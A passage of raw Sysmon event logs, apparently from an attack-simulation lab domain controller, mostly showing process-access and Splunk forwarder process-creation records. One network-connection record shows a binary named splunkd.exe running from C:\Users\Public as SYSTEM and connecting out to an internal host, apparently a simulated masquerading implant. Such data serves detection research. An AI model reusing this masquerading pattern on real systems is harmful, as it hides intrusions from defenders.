Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001838Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.621{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B4-5F84-4E00-000000007F01}3616C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001837Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.621{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001836Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.621{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001835Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.621{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001834Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.621{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001833Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.621{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001832Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.621{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001831Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.621{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001830Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.621{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001829Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.621{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B4-5F84-4E00-000000007F01}3616C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001828Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.621{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001827Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.621{5D479F2C-16B4-5F84-4D00-000000007F01}38603640C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{5D479F2C-16B4-5F84-4E00-000000007F01}3616C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001826Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.622{5D479F2C-16B4-5F84-4E00-000000007F01}3616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5D479F2C-16B4-5F84-4D00-000000007F01}3860C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000001825Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.605{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B4-5F84-4D00-000000007F01}3860C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001824Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.605{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001823Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.605{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001822Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.605{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001821Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.605{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001820Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.605{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001819Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.605{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001818Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.605{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001817Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.605{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001816Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.605{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001815Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.605{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16B4-5F84-4D00-000000007F01}3860C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001814Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.605{5D479F2C-16B3-5F84-4800-000000007F01}32842912C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5D479F2C-16B4-5F84-4D00-000000007F01}3860C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001813Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.618{5D479F2C-16B4-5F84-4D00-000000007F01}3860C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{5D479F2C-16B3-5F84-4800-000000007F01}3284C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 354300x80000000000000001812Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.localUsermode2020-10-12 08:41:22.547{5D479F2C-16A6-5F84-2300-000000007F01}2940C:\Users\Public\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-3574060.attackrange.local49686-false10.0.1.12-7010- 10341000x80000000000000001811Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.480{5D479F2C-16B4-5F84-4C00-000000007F01}37563736C:\Program 